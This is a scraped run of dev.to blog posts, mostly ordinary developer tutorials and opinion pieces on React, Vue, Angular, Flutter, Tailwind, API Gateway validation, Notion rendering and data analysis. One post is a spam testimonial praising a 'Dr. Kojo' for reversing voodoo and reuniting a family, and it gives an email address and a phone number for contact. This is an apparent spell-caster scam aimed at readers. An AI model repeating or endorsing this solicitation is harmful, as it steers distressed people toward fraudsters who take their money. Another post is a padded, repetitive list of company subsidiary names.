the object must have. - `required`: A list of properties that must be present in the object. In our case, `firstName` and `lastName`. ### Attaching the Model and Validator to an API Gateway Method Next, we need to attach our `Model` and `RequestValidator` to an API Gateway method. ### Code Sample: ``` api.root .addResource("/user") .addMethod("POST", user, { requestModels: { "application/json": validatorModel, }, requestValidator: requestValidator, }); ``` By following these steps, you can efficiently validate requests at the API Gateway level, ensuring that only properly structured requests reach your backend services. This not only improves security but also reduces unnecessary processing and potential costs.
iamsherif
1,906,932
How I Got Back The Love Of My Life
To the world, I want to express my deepest gratitude to Dr. Kojo for his incredible help in reuniting...
0
2024-06-30T21:11:46
https://dev.to/how_igotbackmyspouse_/how-i-got-back-the-love-of-my-life-50g9
beginners, learning, discuss, community
To the world, I want to express my deepest gratitude to Dr. Kojo for his incredible help in reuniting my family after my spouse left due to being charmed by his ex girlfriend because she was so jealous of our beautiful family and always wanted a way to get him back to her self by using a voodoo on my spouse which led to separation and leaving our 8 months old daughter behind. I am glad I never gave up on him by doing all I could to bring him back home. With Dr. Kojo's powerful assistance, my husband returned to us, and our family is now stronger than ever. I am endlessly thankful for his remarkable work and urge anyone in need of help or solutions to reach out to him via email: drkojohouseofworship@gmail.com or phone: +2349136217265 Dr. Kojo is truly a remarkable individual who performed miracles for me, and my appreciation for him will never wane.
how_igotbackmyspouse_
1,906,950
O que aprendi sobre Monitoramento de Aplicações Front-End nos últimos meses.
Acredito que todo Programador Front-End já se deparou com algum bug reportado pelo cliente e teve...
0
2024-06-30T21:32:44
https://dev.to/soares_pedro/o-que-aprendi-sobre-monitoramento-de-aplicacoes-front-end-nos-ultimos-meses-18ol
webdev, monitoring, javascript, devops
Acredito que todo Programador Front-End já se deparou com algum bug reportado pelo cliente e teve dificuldades para tentar reproduzir. - O usuário não conseguiu baixar uma planilha. - A tela de detalhes de pedido ficou em branco. - O botão de adicionar ao carrinho não funcionou como deveria. - O carregamento da página está muito lento. Bugs e issues são coisas comuns no dia a dia de qualquer Engenheiro de Software e identificar e diagnosticar esses problemas rapidamente, ou até mesmo antes de um ticket ser aberto é algo crucial. O monitoramento da performance e da saúde da aplicação junto com o uso de ferramentas de logs facilitam muito no diagnóstico de issues de performance, erros e outros problemas que impactam a experiência do usuário. Pensando nisso, vou deixar algumas dicas e boas práticas baseadas na minha experiência e no Livro [BUILDING LARGE SCALES WEB APPS](https://largeapps.dev/). ## Use uma solução centralizada de Logs Usar uma ferramenta centralizada de logs ajuda a coletar e armazenar logs de várias partes da sua aplicação. Isso vai facilitar a pesquisa e a análise dos logs, o que é essencial para as depurações e monitoramento da sua aplicação. Existem várias ferramentas populares hoje no mercado, incluindo o [Splunk](https://www.splunk.com/), [Datadog](https://www.datadoghq.com/) e [Sentry](https://sentry.io/welcome/). Usarei o **Datadog** para alguns exemplos a seguir. ## Faça o upload dos Source Maps De forma resumida, aplicações modernas feitas em **Angular**, **Next** ou qualquer outra ferramenta moderna passam por um processo de build, que serve basicamente para transformar o código que você desenvolveu utilizando uma dessas Frameworks para um código que o browser consegue interpretar, além de outros processos como **minificação** de arquivos, **otimização** de assets e agrupamento (**Bundling**) da aplicação. Durante o processo de build, também é possível gerar os [Sources Maps](https://web.dev/articles/source-maps?hl=pt-br), que são arquivos que mapeiam o código fonte original para o código transpilado, minificado ou agrupado que está sendo executado no navegador. É possível fazer o [upload dos sources maps](https://docs.datadoghq.com/real_user_monitoring/guide/upload-javascript-source-maps/?tab=webpackjs) para ferramentas de monitoramento com o intuito de desofuscar diferentes [stack traces](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error/stack) em erros. Para qualquer tipo de erro, você pode acessar o caminho do arquivo, o número da linha e o snippet do código onde o erro aconteceu. ## Inclua contextos nos seus logs Suponha que você esteja monitorando um [SaaS](https://blog.rocketseat.com.br/desenvolvimento-de-saas-conceito-e-exemplos-de-softwares/). que é dividido entre várias organizações e quer encontrar um log para uma determinada organização. Se nos seus logs não foram incluídos nenhuma informação relacionada a organização, você vai provavelmente tentar aplicar filtros de horários para tentar encontrar o problema mais rapidamente, porém esse processo pode ainda continuar sendo bastante custoso. [Contextos](https://docs.datadoghq.com/logs/log_collection/javascript/#usage) servem para incluir mais informações nos seus logs, como por exemplo o **ID da organização**, **ID do usuário**, **versão da aplicação**, entre outras informações que sejam relevantes para o seu contexto. Isso vai ajudar a encontrar a raiz do problema muito mais rápido, pois vai ser possível filtrar os logs pelos atributos que foram adicionados no contexto. Apenas tenha em mente considerações de privacidade e segurança nas informações contidas no contexto ## Por último, monitore seus logs Monitorar seus logs em tempo real podem ajudar a encontrar problemas rapidamente antes que eles tenham um impacto significativo na experiência do usuário. Isso inclui também a criação de **alertas** para comportamentos não esperados no uso da sua aplicação e análise da **performance** da aplicação quando uma nova release for feita.
soares_pedro
1,906,948
ReactJS vs. AngularJS: A Comparative Analysis of Frontend Technologies
Introduction: In the ever-evolving world of frontend development, choosing the right framework or...
0
2024-06-30T21:30:40
https://dev.to/iniubong_udofot/reactjs-vs-angularjs-a-comparative-analysis-of-frontend-technologies-4o7h
javascript, beginners, react, angular
**Introduction:** In the ever-evolving world of frontend development, choosing the right framework or library can significantly impact the success of a project. ReactJS and AngularJS are two of the most popular technologies in this space, each offering unique features and benefits. This article will compare ReactJS and AngularJS, highlighting their differences, strengths, and use cases. Additionally, I'll share my excitement about using ReactJS during the HNG Internship and my expectations for this experience. **ReactJS: The Component-Based Library** ReactJS, developed by Facebook, is a JavaScript library designed for building user interfaces, particularly single-page applications. It excels in creating complex, interactive web applications through its component-based architecture. Here are some key aspects of ReactJS: Virtual DOM: ReactJS utilizes a virtual DOM to efficiently update and render components, resulting in improved performance. Reusable Components: React encourages the creation of reusable components, promoting code modularity and maintainability. Ecosystem and Community: With a vast ecosystem and active community, ReactJS offers a plethora of libraries, tools, and resources to enhance development. JSX Syntax: ReactJS uses JSX, a syntax extension that combines JavaScript and HTML, making code more readable and writing UI components more intuitive. Advantages of ReactJS: High performance due to virtual DOM. Strong community support and extensive documentation. Rich ecosystem with many third-party libraries and tools. Flexibility in choosing state management solutions (e.g., Redux, Context API). **AngularJS: The Comprehensive Framework** AngularJS, developed by Google, is a comprehensive frontend framework for building dynamic web applications. It follows the MVC (Model-View-Controller) architecture and offers a wide range of features out-of-the-box. Here are some standout features of AngularJS: Two-Way Data Binding: AngularJS automatically synchronizes data between the model and view, simplifying the development process. Dependency Injection: AngularJS's built-in dependency injection system makes it easier to manage and test application components. Directives: AngularJS allows developers to extend HTML with custom attributes and elements using directives, enabling the creation of dynamic and reusable components. Comprehensive Framework: AngularJS provides everything needed for frontend development, including routing, form handling, and HTTP requests. Advantages of AngularJS: Two-way data binding simplifies data synchronization between model and view. Comprehensive framework with a wide range of built-in features. Strong support for building large-scale applications. Enhanced testing capabilities due to dependency injection. **ReactJS vs. AngularJS: A Comparison** Feature: ReactJS AngularJS Type: Library vs Framework Architecture: Component-Based MVC Data Binding: One-Way (with option for two-way) vs Two-Way DOM Handling: Virtual DOM vs Real DOM Learning Curve: Moderate (requires understanding JSX) vs Steep (comprehensive framework) Performance: High (with optimizations) vs Moderate (due to real DOM) Community: Extensive (large ecosystem) vs Large (supported by Google) **My Journey with HNG and ReactJS** As a participant in the HNG Internship, I am thrilled to dive deeper into ReactJS. The internship offers an incredible opportunity to hone my skills, collaborate with other talented developers, and work on real-world projects. Through HNG, I aim to become proficient in ReactJS, leveraging its powerful features to build efficient and scalable web applications. I am particularly excited about the collaborative learning environment at HNG, where I'll get to share knowledge and gain insights from industry experts. Also, added benefits including: The best 20 to be offered a paid apprenticeship for 4 months and that All finalists will be put in the recruitment pool and connected to international companies and I’m sure I’ll be making the top 20. The structured learning path and hands-on projects are designed to prepare interns for the challenges of the tech industry. For more information about the HNG Internship and how you can get involved, check out these links: HNG Internship: https://hng.tech/internship HNG Hire: https://hng.tech/hire Conclusion Both ReactJS and AngularJS offer unique advantages and are suited to different types of projects. ReactJS, with its component-based architecture and high performance, is ideal for interactive and dynamic web applications. AngularJS, on the other hand, provides a comprehensive framework with built-in features, making it a great choice for large-scale applications that require a more structured approach. As I continue my journey with HNG, I look forward to mastering ReactJS and exploring how its flexible and efficient architecture can be leveraged to build innovative and impactful web applications. Whether you choose ReactJS or AngularJS, understanding the strengths and trade-offs of each technology is crucial for selecting the one that best fits your project's requirements. Happy coding!
iniubong_udofot
1,906,947
JasGiigli a Parent Company
JasGiigli JasGiigli, a parent company overseeing various subsidiaries across multiple...
0
2024-06-30T21:21:41
https://dev.to/jasgiigli/jasgiigli-a-parent-company-3ie9
jasgiigli, jasgigli
# JasGiigli JasGiigli, a parent company overseeing various subsidiaries across multiple industries. Established in 2023, JasGiigli has grown to encompass numerous sectors, providing diverse services and products worldwide. ## JasGiigli Subsidiaries - JasGiigli Tech Solutions - JasGiigli Financial Group - JasGiigli HealthCare - JasGiigli Logistics - JasGiigli Construction - JasGiigli Retail - JasGiigli Education - JasGiigli Entertainment - JasGiigli Energy - JasGiigli Hospitality - JasGiigli Legal Services - JasGiigli Marketing - JasGiigli Aerospace - JasGiigli Agritech - JasGiigli BioSciences - JasGiigli CleanTech - JasGiigli Consulting - JasGiigli Fashion - JasGiigli Food & Beverage - JasGiigli GreenTech - JasGiigli Media - JasGiigli Pharmaceuticals - JasGiigli Real Estate - JasGiigli Robotics - JasGiigli Security - JasGiigli Sports - JasGiigli Telecom - JasGiigli Ventures - JasGiigli Wellness - JasGiigli Travel - JasGiigli Analytics - JasGiigli Art & Design - JasGiigli Automotive - JasGiigli Blockchain - JasGiigli Charities - JasGiigli Consulting Engineers - JasGiigli Cosmetics - JasGiigli Cultural Exchange - JasGiigli Cybersecurity - JasGiigli Digital - JasGiigli Eco Solutions - JasGiigli Events - JasGiigli Export - JasGiigli Fashion Tech - JasGiigli Gaming - JasGiigli Green Energy - JasGiigli Home Solutions - JasGiigli Industrial - JasGiigli Innovation - JasGiigli Insurance - JasGiigli Marine - JasGiigli Metals - JasGiigli Music - JasGiigli Renewable Resources - JasGiigli Software - JasGiigli Tourism - JasGiigli Ventures - JasGiigli Water Solutions - JasGiigli Wellness Retreats - JasGiigli Workspace - JasGiigli AdTech - JasGiigli Aerospace Solutions - JasGiigli Agribusiness - JasGiigli AI - JasGiigli Automation - JasGiigli Biotech - JasGiigli Civic Solutions - JasGiigli Cloud Services - JasGiigli Communications - JasGiigli Conservation - JasGiigli Consumer Goods - JasGiigli Consulting Group - JasGiigli Content Creation - JasGiigli Culinary - JasGiigli Cyber Defense - JasGiigli Data Solutions - JasGiigli Design Studio - JasGiigli Digital Health - JasGiigli E-Learning - JasGiigli Engineering - JasGiigli Environmental Services - JasGiigli Event Technology - JasGiigli FinTech - JasGiigli Fleet Management - JasGiigli Food Processing - JasGiigli Green Building - JasGiigli Healthcare IT - JasGiigli Industrial Solutions - JasGiigli LegalTech - JasGiigli Logistics Solutions - JasGiigli Marine Tech - JasGiigli Mobility - JasGiigli PharmaTech - JasGiigli Renewable Energy - JasGiigli RetailTech - JasGiigli Robotics Solutions - JasGiigli Smart Cities - JasGiigli SpaceTech - JasGiigli Sports Tech - JasGiigli Sustainable Products - JasGiigli Tech Ventures - JasGiigli Urban Development - JasGiigli Waste Management - JasGiigli Water Technologies - JasGiigli Wellness Products
jasgiigli
1,906,936
✅ 𝟳 𝗣𝗼𝘄𝗲𝗿𝗳𝘂𝗹 𝗟𝗶𝗳𝗲 𝗟𝗲𝘀𝘀𝗼𝗻𝘀❤️ 𝗬𝗼𝘂 𝗠𝘂𝘀𝘁 𝗟𝗲𝗮𝗿𝗻:)👇
A post by MD.MAHFUZUR RAHMAN SIAM
0
2024-06-30T21:18:35
https://dev.to/siam_khan/-46h1
siam_khan
1,906,933
IRIS PLANT: A TECHNICAL REPORT ON FISHER'S WORK.
Irises, which belong to the Iridaceae family, are attractive decorative herbaceous perennials with...
0
2024-06-30T21:12:55
https://dev.to/davike95/iris-plant-a-technical-report-on-fishers-work-2ofk
Irises, which belong to the Iridaceae family, are attractive decorative herbaceous perennials with complex, upright, and brilliant flowers.The American Iris Society classifies irises into three types: bearded, aril, and beardedless. In general, Bearded and Siberian irises are best suited for Connecticut gardens. Many scientists have worked on and researched on Iris planted, and have gathered so many data that can aid further research on this plant. A review carried out on Iris data set which was gathered by Fisher in the year 1936 shows that the data set contains 3 classes of 50 instances (these instances includes sepal length and width, petal length and width...) each, where each class refers to a type of iris plant. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0obdalfco7zbl7f3nlbt.png) One class is linearly separable from the other 2; the latter are not linearly separable from each other. It is obvious that in the study of Iris plant, the information of the flower parts are essential just as the other parts of the plant in different classes. Technical report is a an indispensable aspect of data analysis. Data analysis skill has proven to be of great benefit to research works. Learn Data analysis skill for free [Hng premium data analysis package](https://hng.tech/premium) Or [Hng free data analysis package](https://hng.tech/internship)
davike95
1,906,925
Flutter
There was a halt to academic activities in federal universities in the country in 2022. The lecturers...
0
2024-06-30T20:52:04
https://dev.to/omobolaji_baruwa_b0706bc2/flutter-100g
There was a halt to academic activities in federal universities in the country in 2022. The lecturers decided to go on strike and leave the classroom as a protest against the federal government. This was a devastating blow, as this meant time away from school doing nothing. As such, I was left with a daunting task of learning a skill while the lecturers remained out of classrooms. While I had always had a thing for coding, I never really thought much of it, as I was in humanities and not sciences. However, I found myself falling in love with flutter and dart after a friend introduced me to the framework. I took it upon myself to find out everything possible about it, and put it to good use. While it's been tough grasping some programming conventions, it's been two wonderful years working with dart and flutter. A mobile development platform is a set of tools, services, and technologies that allows developers, or even anyone, to design, develop, test, deploy, and maintain mobile applications across multiple platforms, devices, and networks. It also allows for the easy implementation and integration of various features into applications. Flutter is a mobile development platform, a unique one at that. It is an open source framework developed and supported by Google for building beautiful, natively compiled, multi-platform applications from a single codebase. Flutter makes it easy and fast to build beautiful apps for mobile and beyond. Generally, you can build any type of cross-platform app using Flutter. The programming language of Flutter is Dart, which was created by Google in 2011. Dart is a typed object programming language that focuses on front-end development, like JavaScript. Improved Productivity The Google-built framework consists of these components: Software Development Kit (SDK) A SDK is a collection of tools that help developers build their applications. It allows them to compile their code into native machine code used on both iOS and Android. Flutter is a framework with a core mobile SDK that offers responsive, stylistic elements without requiring a JavaScript bridge. You can easily integrate Flutter with Android, iOS, Linux, Windows, as well as Fuchsia applications for amazing and seamless performance Widget-based UI Library This framework has various UI elements that can be reused, including sliders, buttons, and text inputs. Flutter provides ready-made widgets for almost all common app functions. Flutter provides a rich set of pre-designed widgets that you can customize to create beautiful interfaces. These widgets are not simple UI elements like buttons and text boxes. They include complex widgets like scrolling lists, navigations, sliders, and many others. These widgets help save you time and let you focus on the business logic of your application. Advantages of flutter framework 1. Flutter allows developers to use the same code to create both iOS and Android apps. In doing so, they save time and resources since they don’t have to build two separate apps. Flutter’s native widgets also reduce time spent on testing by ensuring compatibility with different operating systems. 2. Easy to Learn Flutter developers can create mobile apps without using OEM widgets or a lot of code, making their process much easier and simpler. 3. Better Performance Many users say it’s nearly impossible to tell the difference between a Flutter app and a native mobile app - a big upside for developers. 4. Lower Costs By allowing developers to build apps both for Android and iOS from the same code base, Flutter slashes the coding time by at least half. This means the costs of app development are also reduced. You basically get two apps for the cost of one. 5. Robust Documentation and Strong Community One reason many companies choose Flutter is the robust documentation and resources that helps developers solve problems. Furthermore, Flutter has great community hubs such as Flutter Community and Flutter Awesome where developers can exchange ideas and solve problems. 6. Improved Time-to-Market Speed Generally, Flutter development only requires up to half the time needed to build the same app separately for Android and for iOS. Developers don’t have to write any platform-specific code to achieve the desired visuals in their application. Plus, Flutter provides a declarative API for building user interfaces, helping boost performance. Disadvantages of flutter framework 1. Larger App Size: One of the notable downsides of Flutter is the size of the resulting apps. Flutter apps tend to be larger compared to their native counterparts. This can be a concern for users with limited storage space on their devices or for apps that need to be downloaded over a mobile network. The inclusion of the Flutter framework contributes to this larger size. 2. Performance Concerns: While Flutter has made significant improvements in terms of performance, it may not match the native development experience, especially for graphics-intensive applications or those requiring real-time processing. Flutter utilizes a bridge to communicate with native modules, which can introduce some overhead and potentially affect app performance. 3. Limited Native Features: Flutter provides access to many native features through plugins, but it may not offer access to all platform-specific functionalities. Some advanced or platform-specific features may require more effort to implement in Flutter, potentially leading to development challenges. Having discussed flutter in details, I will be adopting the platform while participating in the HNG 11 internship https://hng.tech/internship, https://hng.tech/hire. It is a fast paced internship that simulates real world working environments. I am participating in this internship to build the resilience required to survive in the highly demanding tech space. Also, it provides a learning opportunity for developers.
omobolaji_baruwa_b0706bc2
1,906,930
React vs Vue: An In-dept. Comparison of Two Frontend Heavyweights
Introduction Two of the most widely utilized frontend frameworks for creating user interfaces in...
0
2024-06-30T21:04:43
https://dev.to/olowoyeye_segun_1206db84a/react-vs-vue-an-in-dept-comparison-of-two-frontend-heavyweights-4c31
reactjsdevelopment, vue, webdev, javascript
**Introduction** Two of the most widely utilized frontend frameworks for creating user interfaces in frontend development are React and Vue. Their design, syntax, and ecosystems are different, even if they each have advantages and disadvantages. We'll go over the distinctions between React and Vue in this post, as well as their advantages and disadvantages. **React** Facebook developed the React library, which optimizes rendering efficiency by using a virtual DOM. Because of its reliance on a component-based architecture, complex interface management is made simpler. The widespread use of React is a result of its strong ecosystem, active community, and compatibility with various tools and frameworks. **Vue** Like React, Vue is a progressive framework that makes use of a virtual DOM. However, Vue adopts a simpler strategy, enabling programmers to create applications with a syntax that is either component-based or template-based. The fastest-growing ecosystem is Vue's, with a heavy emphasis on tooling and developer experience. **Notable Differences Syntax: React employs JSX, while Vue uses a template-based syntax. Architecture: Vue offers a more flexible approach, while React employs a tight component structure. Learning Curve: Because of its more user-friendly syntax and adaptable architecture, Vue has a kinder learning curve. **Advantages and Disadvantages** React: Pros: Sturdy Ecosystem Broad Community Assistance Simple Integration with Additional Libraries Sharp Learning Curve Challenging Architecture Vue: Advantages: Adaptable Design Easier Learning Curve Integrated State Management Cons: Reduced Ecosystem Strength in Community Support **Conclusion** Each framework, React and Vue, has advantages and disadvantages. React is a well-liked option for intricate apps because of its strong ecosystem and extensive community support. However, developers that prioritize ease of use will find Vue to be flexible and have a low learning curve. I anticipate working on difficult projects at HNG and collaborating with developers to provide creative solutions. I'm excited to share my skills, pick up tips from my colleagues, and advance as a developer. We will design and construct high-quality, aesthetically pleasing, and user-friendly applications using React as our frontend technology of choice, which will benefit each intern and me. visit https://hng.tech/internship https://hng.tech/premium for more info
olowoyeye_segun_1206db84a
1,906,929
Notion to Document Page with React JS in 3 minutes
The "Document Page" is commonly used on many websites today for various purposes such as tutorials,...
0
2024-06-30T21:02:58
https://dev.to/quocbahuynh/notion-to-document-page-with-react-js-3fhp
webdev, javascript, react, nextjs
The "Document Page" is commonly used on many websites today for various purposes such as tutorials, news, policies, and more. The challenge in coding document pages is that front-end developers often have to handle a large amount of simple text and repetitive code. Additionally, these documents come in a wide variety of formats. On some simple websites, when a document needs to be updated, the front-end developer has to modify the code manually, which is not efficient. We can solve the problem by using Notion. Notion is an all-in-one workspace tool which supports text documents. The simple idea is to fetch content from a public Notion page and display it on our React page. When a document needs to be updated, we can make the changes in Notion, and our React Page will automatically sync with the public Notion page. For example, we have an exchange policy page in Vietnamese stored on Notion. **1. Switch the page to public and extract its ID on URL.** Switch to public: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k7xnulc41nydi8t5g3e8.png) Extract ID from URL: the ID is located at the end of the URL > https://juun-cheerful.notion.site/Ch-nh-s-ch-ho-n-tr-ti-n-dbc3de7dc52248c4b293ac9114238d35 > => ID: dbc3de7dc52248c4b293ac9114238d35 > https://juun-cheerful.notion.site/H-ng-d-n-mua-h-ng-Beanhop-df2d076768b64bc0aab8f037eca27307 > => ID: df2d076768b64bc0aab8f037eca27307 **2. Install essential react libraries:** ```javascript yarn dev axios yarn dev react-notion ``` - [react-notion](https://github.com/splitbee/react-notion) is used to render content from Notion Json format rule. - axios is used to fetch data from URLs. Splitbee: It is not a react library, it takes the ID of the Notion page as a URL path and responds with the data in the Notion JSON format rule. Take the ID of the notion page as an URL Path: ```javascript //https://notion-api.splitbee.io/v1/page/ + ID //https://notion-api.splitbee.io/v1/page/dbc3de7dc52248c4b293ac9114238d35 ``` Response the data in Notion Json format rule: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3etlnsrwzk9nvbw0lnsr.png) **3. Coding** The basic concept is that we will fetch data from Splitbee and ID of noion page combination and display the content via [react-notion](https://github.com/splitbee/react-notion): ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hvmrr6p02f3gc62tr7sz.png) Note: We have to import all the needed resource to use [react-notion](https://github.com/splitbee/react-notion) and use NotionRenderer component to render received data. Please read more in [react-notion document](https://github.com/splitbee/react-notion) ```javascript import "react-notion/src/styles.css"; import "prismjs/themes/prism-tomorrow.css"; // only needed for code highlighting import { NotionRenderer } from "react-notion"; ``` **4. Result and Live Demo** 1. Website demo: https://www.beanhop.vn/chinh-sach-hoan-tien-beanhop 2. Origin notion: https://calico-harmonica-575.notion.site/Ch-nh-s-ch-ho-n-tr-ti-n-dbc3de7dc52248c4b293ac9114238d35 ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sg2o8sp3hxt47s78bshg.png) Finally, I hope it will be helpful to you. If you have some questions, just comment below.
quocbahuynh
1,906,928
Is medical diagnosis Web API useful for development?
Yes, medical diagnosis Web APIs can be incredibly useful for development in various...
0
2024-06-30T21:01:53
https://dev.to/rustemsoft_llc_4b38a13294/is-medical-diagnosis-web-api-useful-for-development-25fb
**Yes**, medical diagnosis Web APIs can be incredibly useful for development in various healthcare-related applications and systems. Here are some reasons why: **Access to Expertise:** Medical diagnosis APIs are often built on extensive medical knowledge and algorithms developed by healthcare professionals. They can provide access to diagnostic capabilities that may be beyond the expertise of individual developers or organizations. **Efficiency and Accuracy:** These APIs can automate and streamline the diagnostic process, potentially reducing human error and improving the accuracy of initial assessments. This can be especially valuable in triage systems, telemedicine platforms, or decision support tools. **Integration with Applications:** Developers can integrate medical diagnosis APIs into their applications easily through standardized web protocols (such as RESTful APIs). This allows for seamless incorporation of diagnostic functionalities without having to build everything from scratch. **Scalability:** APIs are scalable by nature, meaning they can handle large volumes of requests from multiple users or systems simultaneously. This scalability is crucial for applications that serve a large user base or require real-time processing. **Cost-Effectiveness:** Instead of investing resources in developing and maintaining an in-house diagnostic system, using an API can be cost-effective. It reduces development time and ongoing maintenance efforts, leveraging the expertise and infrastructure provided by the API provider. **Updated Medical Knowledge:** API providers often update their algorithms and databases with the latest medical knowledge and research findings. This ensures that the diagnostic results are based on current medical standards and practices. **Customization and Flexibility:** Many medical diagnosis APIs offer customizable options, allowing developers to tailor the diagnostic criteria or outputs to suit specific application needs or user preferences. **Regulatory Compliance:** Reputable medical diagnosis APIs often adhere to healthcare data privacy regulations (such as HIPAA in the United States), ensuring that sensitive patient information is handled securely and in compliance with legal requirements. **Considerations:** Accuracy and Reliability: While medical diagnosis APIs can be highly accurate, their performance may vary depending on the quality of the underlying algorithms and data. It's important to evaluate the API provider's track record and reputation. Integration Complexity: Integrating with medical APIs requires understanding of healthcare terminology, data formats, and potential regulatory requirements. Developers should be prepared to handle these complexities during integration. User Interface Design: While APIs provide diagnostic capabilities, developers are responsible for designing user-friendly interfaces and workflows that effectively communicate diagnostic results to end-users (healthcare providers or patients). In conclusion, medical diagnosis Web APIs offer significant benefits for developers looking to incorporate advanced diagnostic capabilities into healthcare applications, improving efficiency, accuracy, and overall user experience. Use [SmrtX Diagnosis Web API](https://rapidapi.com/rustemsoft/api/diagnosis) to build a medical diagnostic system.
rustemsoft_llc_4b38a13294
1,906,914
How to Vertically Align Content with Tailwind CSS Across a Full-Screen Div
Vertical alignment can often be a challenge in web design, but with Tailwind CSS, you can easily...
0
2024-06-30T21:00:00
https://devdojo.com/bobbyiliev/how-to-vertically-align-content-with-tailwind-css-across-a-full-screen-div
tailwindcss, css, webdev, beginners
Vertical alignment can often be a challenge in web design, but with Tailwind CSS, you can easily align elements in the center of the screen. This quick guide will walk you through the steps to vertically align content within a full-screen div using Tailwind CSS, complete with nicely styled examples. ![CSS meme](https://media4.giphy.com/media/v1.Y2lkPTc5MGI3NjExYnk2M2Yxa2J4OGJjcjJyM3kwMjZxdXl2OHI4amR0aXA3a3J2OHh4YiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/13FrpeVH09Zrb2/giphy.webp) ## Step 1: Setting Up Tailwind CSS First, make sure you have Tailwind CSS set up in your project. If you're starting from scratch, you can use the following CDN link in your HTML file: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Vertical Alignment with Tailwind CSS</title> <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"> </head> <body> <!-- Your content will go here --> </body> </html> ``` If you're using a build tool like Webpack or a framework like Next.js, refer to the [Tailwind CSS installation guide](https://tailwindcss.com/docs/installation) for the appropriate setup. ## Step 2: Creating the Full-Screen Div To create a full-screen div, we'll use Tailwind's utility classes. We'll start by creating a div that spans the full viewport height and width. Here's a simple example: ```html <div class="min-h-screen flex items-center justify-center bg-gray-100"> <!-- Content goes here --> </div> ``` - `min-h-screen`: This class sets the minimum height of the div to the full height of the viewport. - `flex`: This makes the div a flex container. - `items-center`: This vertically centers the content inside the flex container. - `justify-center`: This horizontally centers the content inside the flex container. - `bg-gray-100`: This adds a light gray background color to the div. ## Step 3: Adding Content Now, let's add some content inside our full-screen div. We'll use a simple card component as our example: ```html <div class="min-h-screen flex items-center justify-center bg-gray-100"> <div class="bg-white p-8 rounded-lg shadow-lg"> <h1 class="text-2xl font-bold mb-4">Vertically Aligned Content</h1> <p class="text-gray-700">This content is centered both vertically and horizontally using Tailwind CSS.</p> </div> </div> ``` - `bg-white`: This sets the background color of the card to white. - `p-8`: This adds padding to the card. - `rounded-lg`: This rounds the corners of the card. - `shadow-lg`: This adds a large shadow to the card. - `text-2xl`: This sets the font size of the heading to 2xl. - `font-bold`: This makes the heading bold. - `mb-4`: This adds a bottom margin to the heading. - `text-gray-700`: This sets the color of the paragraph text to a dark gray. ## Step 4: Styling the Content To make our example more visually appealing, we can add some additional styling. Let's enhance the card with a more polished look: ```html <div class="min-h-screen flex items-center justify-center bg-gradient-to-r from-blue-500 to-purple-600"> <div class="bg-white p-8 rounded-lg shadow-2xl transform hover:scale-105 transition-transform duration-300"> <h1 class="text-3xl font-extrabold mb-6 text-transparent bg-clip-text bg-gradient-to-r from-green-400 to-blue-500"> Vertically Aligned Content </h1> <p class="text-gray-800 text-lg"> This content is centered both vertically and horizontally using Tailwind CSS. </p> </div> </div> ``` - `bg-gradient-to-r from-blue-500 to-purple-600`: This creates a background gradient for the full-screen div. - `shadow-2xl`: This adds a larger shadow to the card. - `transform hover:scale-105 transition-transform duration-300`: This adds a scaling effect when the card is hovered over, with a smooth transition. - `text-3xl`: This sets the font size of the heading to 3xl. - `font-extrabold`: This makes the heading extra bold. - `text-transparent bg-clip-text bg-gradient-to-r from-green-400 to-blue-500`: This creates a gradient text effect for the heading. - `text-lg`: This sets the font size of the paragraph text to large. ![](https://imgur.com/WVmQnRv.png) ## Conclusion By using Tailwind CSS's utility classes, you can easily vertically align content within a full-screen div. The flexbox utilities provided by Tailwind make it simple to center content both vertically and horizontally with just a few classes. For even more styling options and to create beautiful designs effortlessly, check out the [DevDojo Tails Tailwind CSS builder](https://devdojo.com/tails?ref=bobbyiliev). It's a fantastic tool to help you with your workflow and create stunning designs with Tailwind CSS.
bobbyiliev
1,906,927
HNG DATA ANALYSIS INTERNSHIP
https://hng.tech/internship https://hng.tech/premium Introduction: The data was collected from about...
0
2024-06-30T20:57:18
https://dev.to/ojo_oyenike_2d458c1ededf3/hng-data-analysis-internship-5gbg
ERROR: type should be string, got "https://hng.tech/internship\nhttps://hng.tech/premium \n**Introduction**: The data was collected from about 2823 observations from 2003 to 2005. It depicts information on the sales made from orders from various countries. The productline ordered ranged from classic cars, motorcycles, planes, ships, trains, trucks and buses, and Vintage cars. The data also reveal the quantity ordered and price per item area.\n\n**Observation**: The total quantity of classic cars ordered was 33,992 making it the highest order received. This is followed by Vintage cars with 21,069 ordered. A total of 11,663 was ordered for Motorcycles making it the third in rank in terms of quantity ordered. In like manner, planes, ships, and trains had 10,727, 8127, and 2712 respectively. The total amount ordered for the three years is 99,067, and the orders for classic cars cover over 34%. This reflected the sum of sales made by the business that made it. The focus should be on the productline where, the business has more advantages, which are cars (both classic and vintage. At the same time, more market strategies should be put up to improve sales from other productlines. About 92 per cent of the total ordered goods were shipped, which means a complete business transaction. The remaining 8 per cent were either cancelled, disputed, in progress, on hold, or resolved.\nIn addition, more sales were made in the 4th quarter than other the quarters. Although the data did not include the sales for 2005, 2004 had the highest sum of sales. Also, countries like the USA, Spain, France, and Australia are where the business had very high orders, the US being the highest. The business needs more strategies to increase sales from countries like Germany, Ireland, Belgium, and Austria where sales are comparatively low. \nIn conclusion, the business had a better sum of sales in vintage cars and classic cars. Geographical location where they had high sales in the USA and the lowest in Germany. However, further analysis should be carried out to investigate the relationship between the quantity ordered and the customers’ location. Why is the order for productlines of non-commercial vehicles higher than that of commercial vehicles, (train, Ships, and Plane)? Does the price of each product affect its sales? These will help improve market strategies for the business to increase sales.\n\nFigure 1: Chart on the sum of sales against the productline\n \n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pglly78avcw6w76mqw3a.png)\n\n\n\nFigure 2: Chart on the sum of sales against quarter and year.\n \n \n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tjpp6exmq1o0qoap5qns.png)\n\nWritten by Ojo Oyenike.\n"
